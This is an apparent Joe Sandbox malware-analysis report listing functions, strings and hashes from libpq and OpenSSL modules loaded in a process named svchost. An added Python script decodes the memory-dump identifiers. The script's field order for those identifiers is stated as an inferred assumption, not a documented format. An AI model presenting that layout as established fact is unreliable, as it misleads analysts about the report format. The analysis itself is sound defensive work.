                                                                                            • Instruction Fuzzy Hash: EC11A211B1B20241FE859746F46167A0243AF89FC0E9C7034EE9D5B7C7DD2EE5954748
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$isspacestrtol
                                                                                            • String ID: invalid integer value "%s" for connection option "%s"
                                                                                            • API String ID: 1719268402-1116420462
                                                                                            • Opcode ID: 8da0add9b8edb0698956a08a95f70b84b549ed375abf43c26cdfa670729aff50
                                                                                            • Instruction ID: f353a8f9ad926f438dd91f5c345f69f18dbac944ec54c97ef3c9de8ca14354b7
                                                                                            • Opcode Fuzzy Hash: 8da0add9b8edb0698956a08a95f70b84b549ed375abf43c26cdfa670729aff50
                                                                                            • Instruction Fuzzy Hash: 4321BE32B0EA5186FB114F12E46017977A2EB85BC0F1D6031EA8A57786CF7ED8448B54
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: fputc
• String ID: %d$ NNNN$ParameterDescription$mismatched message length: consumed %d, expected %d
• API String ID: 1992160199-3139820411
• Opcode ID: 25dadfa0205deaad2421ea02d93821641b1c4ac4cad77e70dfda24d0e451951c
• Instruction ID: fa511e1ae37e2edfadff1c19e8b36f9cfb17834e13ef9f124187287ce0c90fda
• Opcode Fuzzy Hash: 25dadfa0205deaad2421ea02d93821641b1c4ac4cad77e70dfda24d0e451951c
• Instruction Fuzzy Hash: BF219D62B1B65681FA50DB15E5606B82363AF807C8F587032DE0E27386DE7FE449C708
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: ErrorLast$R_clear_errorR_get_error
• String ID: unrecognized SSL error code: %d
• API String ID: 2453900891-952604332
• Opcode ID: 4007d4ba6e32ea23d925f505832090b004d32a86b82b32bd38b80115af959a6b
• Instruction ID: 054a5a6bf6292c1c97d2fb1e7de62402df8b28341ebad2efe66dd7ef71301601
• Opcode Fuzzy Hash: 4007d4ba6e32ea23d925f505832090b004d32a86b82b32bd38b80115af959a6b
• Instruction Fuzzy Hash: 4111C822B0AA4241FE61AF25E8253FA5353AF48BD4F5C5231DD1D5B3D7DE2DE5048348
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: fputc
• String ID: %d$ NNNN$BackendKeyData$mismatched message length: consumed %d, expected %d
• API String ID: 1992160199-637624318
• Opcode ID: dd555d9ec9d1b90d6c13fdf9287be0343ce7c5152412a7d6c55692e41b67fe8d
• Instruction ID: 27d4f070680631933f2629953db311b9f4a233536781d9cd6151a19312780808
• Opcode Fuzzy Hash: dd555d9ec9d1b90d6c13fdf9287be0343ce7c5152412a7d6c55692e41b67fe8d
• Instruction Fuzzy Hash: 4E118B61B1B64681FA10DB15E2616B92323AF407C8F487132DE0E2779BCEAFE459C708
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: fputc
• String ID: "%s"$ParameterStatus$Sync$mismatched message length: consumed %d, expected %d
• API String ID: 1992160199-854722980
• Opcode ID: 26a4c0d4b8ce23fdba49f9349e8e56aee1c591cd4a5fc701d122c9a091cea83e
• Instruction ID: c210036048778810e76bbde312770d469f70dbf69af994b0c5cd35ac4cafad33
• Opcode Fuzzy Hash: 26a4c0d4b8ce23fdba49f9349e8e56aee1c591cd4a5fc701d122c9a091cea83e
• Instruction Fuzzy Hash: EE118F61B1B68682FA10D755E4616F82363AB447D8F486132DE0E27397DE7EE14AC318
APIs
• _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5DCC
• __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5DFC
• _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFDA36F5EED,?,?,?,?,00007FFDA36F43A0), ref: 00007FFDA36F5E14
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: _errno$__acrt_iob_func
• String ID: unrecognized win32 error code: %lu
• API String ID: 2236517449-585351251
• Opcode ID: 428fbe94ade0e3b18c656962f5047164a2a92e0c565cf3502fdcf36ae76afd58
• Instruction ID: 1827e97b26472e6a1f9f795020c62ae1e32497ce816c20406cd256e6296867cf
• Opcode Fuzzy Hash: 428fbe94ade0e3b18c656962f5047164a2a92e0c565cf3502fdcf36ae76afd58
• Instruction Fuzzy Hash: 1A0136B2F07A0283FB194F55A8652783262AF48751F4D607DCA0E57352DE3D58D58738
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: memcpystrncmpstrspn
• String ID: 0123456789$INSERT
• API String ID: 2919444188-1779590252
• Opcode ID: 076928b9be6be65e563f76d8eedd73c005b2c5abee4e6e329260d2cfde2ab327
• Instruction ID: 372d3094b3f572a2428607a39eb1b7ae9491b010a36b9f7315e265fb6c298b85
• Opcode Fuzzy Hash: 076928b9be6be65e563f76d8eedd73c005b2c5abee4e6e329260d2cfde2ab327
• Instruction Fuzzy Hash: BAF03162B0BA4582FB409F15E9603B52392AF58BC0F8C3031C90D57756FF6DD5A8C718
APIs
• OPENSSL_LH_set_down_load.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3CF
• OPENSSL_LH_doall_arg.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3E2
• OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3EE
• OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFDA364A6FB,?,00007FFDA363B921), ref: 00007FFDA364A3F7
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
• Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
Similarity
• API ID: H_deleteH_doall_argH_freeH_set_down_load
• String ID: ssl\quic\quic_lcidm.c
• API String ID: 473658108-3923830422
• Opcode ID: 550a5efd96314d58762f6876004fea294068b4d5f562269aa692825f48097bde
• Instruction ID: 4941ba298c9ad1f2fcdf27e53bc078e93c85dbe845025f30a9ba84b54f7b220d
• Opcode Fuzzy Hash: 550a5efd96314d58762f6876004fea294068b4d5f562269aa692825f48097bde
• Instruction Fuzzy Hash: 57F05451F0998293FA04DB17DAA517CA323EF88BC4F08A431DE0D577A7DE2DD4614308
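The memory-dump identifiers repeated in every entry above say where each function's bytes were captured, and two distinct modules appear in this stretch of the report: one at 0x7FFDA36D0000 (module index 0xD) whose strings are those of PostgreSQL's libpq client library (BackendKeyData, ParameterStatus, "lost synchronization with server"), and one at 0x7FFDA3600000 (index 0xF) that imports LIBCRYPTO-3-X64 and names ssl\quic\quic_lcidm.c, i.e. OpenSSL 3's libssl. The Python below is an added example, not part of the Joe Sandbox report. It parses the .sdmp identifiers and snapshot names copied from this page, decodes the protection and region-type fields with the winnt.h constants, and cross-checks each module's dumps against the IDA-plugin snapshot name from the same entry. The field order (PID, stage, sequence, address, protection, flags, type, module index) is an assumption inferred from how the values line up with the snapshot names (PID 42 = 0x2A, stage 2, base address) and with a normal PE section layout; PAGE_* and MEM_* values are the documented Windows constants.

```python
"""Decode the Joe Sandbox memory-dump identifiers quoted in the entries above.

Added example, not part of the Joe Sandbox report. The .sdmp identifiers and
snapshot names are copied from this page; the field order is an ASSUMPTION
inferred from how the values line up with the snapshot names and with a normal
PE section layout. PAGE_* / MEM_* values are the winnt.h constants.
"""
import re
from dataclasses import dataclass

# winnt.h page-protection and region-type constants (facts, not assumptions).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x00020000: "MEM_PRIVATE", 0x00040000: "MEM_MAPPED", 0x01000000: "MEM_IMAGE"}

# ASSUMED field order: pid.stage.seq.address.protect.flags.type.module (hex fields).
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<addr>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<flags>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp$"
)
# Snapshot name as it appears on the page: hcaresult_<pid>_<stage>_<base>_<image>.jbxd
SNAPSHOT_RE = re.compile(
    r"^hcaresult_(?P<pid>\d+)_(?P<stage>\d+)_(?P<base>[0-9a-f]+)_(?P<image>.+)\.jbxd$"
)

# Identifiers copied from the entries on this page (module index 0xD and 0xF).
MODULE_D_DUMPS = [
    "0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp",
    "0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp",
]
MODULE_F_DUMPS = [
    "0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp",
    "0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp",
    "0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp",
    "0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp",
    "0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp",
]


@dataclass(frozen=True)
class Region:
    pid: int
    stage: int
    address: int
    protect: int
    mem_type: int
    module: int

    @property
    def protect_name(self) -> str:
        # The low byte carries the PAGE_* value; modifier bits would sit above it.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)  # PAGE_EXECUTE* values are 0x10..0x80

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")


def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an sdmp identifier: {name}")
    return Region(
        pid=int(m["pid"], 16), stage=int(m["stage"], 16), address=int(m["addr"], 16),
        protect=int(m["protect"], 16), mem_type=int(m["type"], 16), module=int(m["module"], 16),
    )


def module_layout(names):
    """Order one module's dumps by address and report them relative to the lowest one."""
    regions = sorted((parse_sdmp(n) for n in names), key=lambda r: r.address)
    if len({r.pid for r in regions}) != 1 or len({r.module for r in regions}) != 1:
        raise ValueError("dumps span more than one process or module")
    base = regions[0].address
    return {
        "pid": regions[0].pid, "stage": regions[0].stage, "base": base,
        "module": regions[0].module,
        "regions": [(r.address - base, r.protect_name, r.type_name) for r in regions],
        "executable": [r.address - base for r in regions if r.executable],
    }


def matches_snapshot(layout, snapshot: str) -> bool:
    """Cross-check a layout against the IDA-plugin snapshot name from the same entry."""
    m = SNAPSHOT_RE.match(snapshot)
    return bool(m) and (int(m["pid"]), int(m["stage"]), int(m["base"], 16)) == (
        layout["pid"], layout["stage"], layout["base"])


if __name__ == "__main__":
    for dumps, snap in ((MODULE_D_DUMPS, "hcaresult_42_2_7ffda36d0000_svchost.jbxd"),
                        (MODULE_F_DUMPS, "hcaresult_42_2_7ffda3600000_svchost.jbxd")):
        lay = module_layout(dumps)
        print(f"pid {lay['pid']} module 0x{lay['module']:X} base 0x{lay['base']:X} "
              f"snapshot ok={matches_snapshot(lay, snap)}")
        for off, prot, typ in lay["regions"]:
            print(f"  +0x{off:06X}  {prot:<24}{typ}")
```

Run on the page's identifiers, both modules come out as five MEM_IMAGE regions with only the region at +0x1000 executable (PAGE_EXECUTE_READ), headers and read-only data at PAGE_READONLY and one PAGE_READWRITE data region: the layout of an intact, file-backed image rather than an unpacked or injected RWX blob. Both sets carry PID 0x2A and stage 2, which is what the snapshot names (hcaresult_42_2_...) state, so the cross-check passes; a mismatch would mean the field-order assumption above is wrong for that report version.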
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: _errno$libintl_dgettext
• String ID: lost synchronization with server: got message type "%c", length %d$no COPY in progress$out of memory
• API String ID: 2163055111-1965408795
• Opcode ID: 5576f990c1db1dc8e20ea08c1831423e82589330521fd98d53272a0eebba8964
• Instruction ID: fe99434af8ba785786fe7d93dbc6d04d6ed17085ff127310475665d48667f68a
• Opcode Fuzzy Hash: 5576f990c1db1dc8e20ea08c1831423e82589330521fd98d53272a0eebba8964
• Instruction Fuzzy Hash: 4C812572B0A64242FB119F69A5603BD63A3AF84BA4F1C6031DF0D563D6EE3DD4898704
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: malloc
• String ID: '$incomplete multibyte character$out of memory
• API String ID: 2803490479-3165003887
• Opcode ID: ce1a2626aa9aecc54152972bc7dddfd0e82f25aca7f3464f5780a0f307f8c8c6
• Instruction ID: 8d936a0e350e4ff0487a9faf6f66dbbb95f79c971948ad92f1acc58df948de96
• Opcode Fuzzy Hash: ce1a2626aa9aecc54152972bc7dddfd0e82f25aca7f3464f5780a0f307f8c8c6
• Instruction Fuzzy Hash: 10513D13B0FA9641FA618B2555303796AD3AF59BC4F1D2432DE8D5BB87DE3EE4428308
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: malloc
• String ID: %s$NOTICE$out of memory$show password_encryption
• API String ID: 2803490479-452457463
• Opcode ID: 34618062cabeb44f24aa80e125a0ad58118d368cf15b00aa2edb7575cc0e2954
• Instruction ID: 00e53ef0cc652b541facf5e91948d4a709ceb7b4e2803eb70193841472761d52
• Opcode Fuzzy Hash: 34618062cabeb44f24aa80e125a0ad58118d368cf15b00aa2edb7575cc0e2954
• Instruction Fuzzy Hash: E161B062B0AB8182FB508F24E4203A933A2FB45B84F4CA235CB9D5B78ADF3DD145C754
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: %.*g$0$NaN$e
                                                                                            • API String ID: 3510742995-3571424521
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID: SELECT pg_catalog.pg_is_in_recovery()$SHOW transaction_read_only$server is in hot standby mode$session is read-only
                                                                                            • API String ID: 1294909896-432320915
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: calloc$free
                                                                                            • String ID: 57P03$n
                                                                                            • API String ID: 171065143-3418334148
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36D8970
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00007FFDA36D8A2D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freemalloc
                                                                                            • String ID: forbidden value %%00 in percent-encoded value: "%s"$invalid percent-encoded token: "%s"$out of memory
                                                                                            • API String ID: 3061335427-1971652480
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpystrlen$mallocstrcmp
                                                                                            • String ID:
                                                                                            • API String ID: 1163645620-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: DigestInit_exP_md5R_clear_errorR_get_errorR_reason_error_string
                                                                                            • String ID:
                                                                                            • API String ID: 659436333-0
                                                                                            APIs
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D7F57,?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36DAF56
                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D7F57,?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36DAF70
                                                                                            • strchr.VCRUNTIME140(?,?,?,00007FFDA36D7F57,?,?,00000000,00007FFDA36D3407), ref: 00007FFDA36DAF82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp$strchr
                                                                                            • String ID: postgres://$postgresql://
                                                                                            • API String ID: 3994671920-2050216600
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdup
                                                                                            • String ID: "
                                                                                            • API String ID: 2653869212-123907689
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatLibraryLoadMessage
                                                                                            • String ID: (0x%08X/%d)$unrecognized socket error: 0x%08X/%d
                                                                                            • API String ID: 1084892078-2205565054
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: getnameinfo
                                                                                            • String ID: ???$@%s$[local]
                                                                                            • API String ID: 1866240144-3141298523
                                                                                            APIs
                                                                                            • isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB5F6
                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB612
                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FFDA36EB2A4), ref: 00007FFDA36EB669
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fwrite$isprint
                                                                                            • String ID: \x%02x
                                                                                            • API String ID: 1439498453-50714050
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_zallocR_newR_set_debug
                                                                                            • String ID: ssl\record\methods\tls_common.c$tls_prepare_record_header_default
                                                                                            • API String ID: 905617597-2004125817
                                                                                            • Opcode ID: f3dd5f6953c47746d34333d2e5784e37c23bdefd11a8f40233dd4ab326b1767e
                                                                                            • Instruction ID: 737f27c5de0066e97014d43ca22a4acb5bb85348afe407fa5a3a7ed5a825b500
                                                                                            • Opcode Fuzzy Hash: f3dd5f6953c47746d34333d2e5784e37c23bdefd11a8f40233dd4ab326b1767e
